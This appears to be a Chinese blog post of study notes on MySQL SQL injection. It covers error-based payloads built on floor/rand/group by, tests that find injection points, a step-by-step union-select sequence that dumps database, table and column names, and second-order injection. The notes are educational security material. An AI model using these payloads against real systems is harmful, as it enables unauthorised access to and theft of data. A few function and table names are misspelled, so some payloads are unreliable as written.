sql注入总结

已于 2022-08-16 21:29:02 修改
阅读量824 收藏 2
点赞数
文章标签: sql 数据库 安全
于 2022-08-16 21:16:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51692662/article/details/126373551
版权

1、数据库结构(mysql)

2、注入的主要函数

2.1连接函数

concat()——没有分隔符

concat_ws()——含有分隔符

group_concat()——用逗号分开

2.2、截取字符串主要函数

mid(m,n,len)——从m字符串开始到n位置,截取长度为len的子字符串

substr(m,n,len)——从m字符串开始到n位置,截取长度为len的子字符串

left(s,n)——取字符串s前n个字符

if(条件,真,假)

ascii()——转为ascii码(盲注使用)

2.3、报错函数

updataxml()——主要利用第二参数xpath语法报错

extractvalue()——主要利用第二参数xpath语法报错

floor(x)——返回小于或者等于x的最大整数

和count()、group by  构造payload——select count(*) from users group by concat(database,floor(rand(0)*2))

```````解释payload:

rand()默认范围0-1随机数,配合floor(i+rang()*(j-i))——介于i,j之间随机数,指定参数的话生成固定随机数列rand(0)*2生成0或者1

group by和conut
在使用group by 和count后,group by 会依次从users表中查询记录,建立一张虚拟的表,当表中的Key(主键)存在时,count会自动+1,如果key不存在,则将key插入到临时表中

group by 和rand
而当group by与rand一起使用时,如果临时表中没有该主键,rand会再计算一次,率先将第二次的计算结果插入到临时表,导致主键重复报错(也就是这个特性导致报错)

总结:
floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。

3、注入姿势

3.1

根据参数类型:数字型,字符型,搜索型
根据提交方式:post注入,get注入,http head注入
根据有无回显:联合注入,报错注入,布尔注入,延迟注入
其他注入:堆叠注入,宽字节注入,二次注入


3.2、 sql注入点的判断


1、?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面部分数据显示不正常,那么可以确定此处为数字型注入
2、?id=1' and 1=1--+/#和?id=1'and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者部分显示不正常,那么可以确定此处为字符型注入
3、?id=1' and 1=1 and '1'='1和?id=1'and 1=2 and '1'='2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者部分显示不正常,那么可以确定此处为字符型注入
4、?id=1%' and 1=1 --+/#和?id=1%'and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者部分显示不正常,那么可以确定此处为搜索型注入
5、?id=1' and 1=1 and '%'='%和?id=1'and 1=2 and '%'='%进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者部分显示不正常,那么可以确定此处为搜索注入


3.3、根据有无回显:联合注入,报错注入,布尔注入,延迟注入、联合注入:


        1、注入点判断--?id=1 and 1=1 ?id=1 and 1=2
        2、判断列数--?id = 1 order  by 3
        3、爆出显示位--?id = -1 union select  1,2,3
        4、爆出数据库名和版本--?id = -1union select  1,database(),version()
        5、爆表--?id = -1 union select  1,2,group_concat(table_name)  from information.tables where table_schema = '爆出数据库的名字'
        6、爆列--?id = -1 union select  1,2,group_concat(column_name)  from information.column s where table_name = '爆出数据表的名字'


3.4、二次注入


   二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到 SQL 查询语句所导致的注入。防御者可能在用户输入恶意数据时,对其中的特殊字符进行了转义处理;但在恶意数据插入到数据库时,被处理的数据又被还原并存储在数据库中,当 Web 程序调用存储在数据库中的恶意数据并执行 SQL 查询时,就发生了 SQL 二次注入。 
过程:      
(1)先构造语句(此语句含有被转义字符的语句,如 mysql_escape_string、mysql_real_escape_string 转义)
(2)将我们构造的恶意语句存入数据库(被转义的语句)
(3)第二次构造语句(结合前面已被存入数据库的语句构造。因为系统没有对已存入的数据做检查,成功注入)

安全~小菜鸡
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL注入总结
qq_46081990的博客
04-22 3992
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
浅谈Sql注入总结笔记整理(超详细)
baimaozi008的博客
06-16 1001
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息,在实战和测试中,难免会遇见到一些sql注入,下面,我将总结一些常用sql注入中的不同姿势。
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 5790
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
CTF-SQL注入总结
SWC0619的博客
03-11 8258
SQL注入总结(一)
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL 注入总结
wkend的博客
10-10 3003
0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术。 0x02 SQL注入的分类 按变量类型分 数字型 字符型 按HTTP提交方式分 GET注入 POST注入 Cookie注入 按注入方式分 报错注入 盲注 布尔盲注 时间盲注 union注入 编码问题 宽字节注入 0x03识别后台数据库 1. 根据操作...
【CTF】SQL 注入 总结
algae
08-15 970
思路 技巧 常见URL编码 # %23 工具 sqlmap 绕过
Sql注入总结
weixin_40709439的博客
05-12 2011
Sql注入总结 联合查询: 1、利用闭合变量报错测试注入点, ?id=1’ .这样说明存在单引号闭合注入 2、是否存在注入点,用and语句测试 ?id=1’ and 1=2# ?id=1’ and 1=1# 3、猜测字段 ,?id=1’ order by 3%23 4、找到页面中数据输入点, ?id=-1’ union select 1,2,3%23 5、查数据库,?id=1’ union ...
DVWA SQL注入总结
iO快到碗里来
05-13 1112
DVWA SQL Injection 1.判断是否存在漏洞 输入1提交-回显用户信息 输入1‘提交-服务器报错:数据库为Mysql 2.判断POC方式 输入 1‘ or ‘1’=’1 回显所有用户信息 在这里我们可以使用union注入 查询字段数 1‘ order by 1-- ;1’ order by 10-- ;…(二分法) 最后确定为2 确定回显点 -1‘ union select 1,2 -- ; 最后确定为2 查询用户名和数据库名 -1’ union select user(),dat
SQL注入学习总结
YouthBelief的博客
10-09 4623
SQL注入1.sql注入原理2.sql注入的分类3.sql注入可能出现的功能点4.判断是否存在sql注入Mysql注入中常用函数一、联合查询注入二、报错注入三、布尔盲注四、时间盲注五、堆叠注入六、json注入5.sql注入的绕过测试环境总结 1.sql注入原理 web程序未对用户输入的数据进行严格的检查和过滤就拼接到后台的sql语句中执行,从而被黑客利用进行数据库的增删查改或写入webshell。 2.sql注入的分类 根据数据类型分为:数字型、字符型、搜索型。 根据提交方式分为:get型 post型 c
sql注入攻击常用语句总结
03-29
sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴
SQL注入漏洞全接触.ppt
11-15
"SQL注入漏洞全接触"知识点总结 一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...
SQL注入的2个小Trick及示例总结
09-09
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有进行适当的参数化或转义,攻击者可以通过输入恶意SQL代码来控制或操纵数据库。本文将详细介绍两个关于SQL注入的小技巧...
SQL Server 临时存储过程及示例
08-05 314
在本文中,我们将深入探讨 SQL Server 中的临时存储过程,并提供一些实际的示例。在我们之前的文章中,我们讨论了 SQL Server 存储过程中的返回值。前缀创建的存储过程称为全局临时存储过程。这种类型的存储过程可以被 SQL Server 中的其他连接访问,直到创建该过程的连接关闭为止。在数据库中临时创建的存储过程称为临时存储过程,这些存储过程不会永久存储在数据库中。临时存储过程在连接到不支持 Transact-SQL 语句或批次的执行计划重用的早期版本的 SQL Server 时非常有用。
力扣高频SQL 50题(基础版)第三十八题
m0_70882914的博客
08-02 347
1484.按日期分组销售产品
SQLTools插件下载与使用说明
最新发布
08-05 295
9、右键菜单SOSI信息 - 查看表信息的sosi.sql脚本的简化版, 可读方式显示字段的low_value与high_value,快速判断谓词越界;SQLTools是一个专注于SQL优化与管理的plsql developer插件,目的是把一些常用的SQL收集在一起,方便快速解决问题,提高工作效率。6、SQL固化脚本生成器 - 只需提供两个SQL_ID,就能生成用固化SQL的脚本,快速优化SQL;3、SQL优化 - 主力工具:SQL优化工具集合,用于分析、优化SQL,快速解决性能问题;
SQL注入深度解析与防护策略
"SQL注入详解,黑客必学的技能,涉及SQL注入的各个方面,包括背景、原理、分类、渗透测试及具体攻击类型" 在网络安全领域,SQL注入是一种常见且危害极大的攻击方式,它主要针对使用SQL(结构化查询语言)的Web应用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值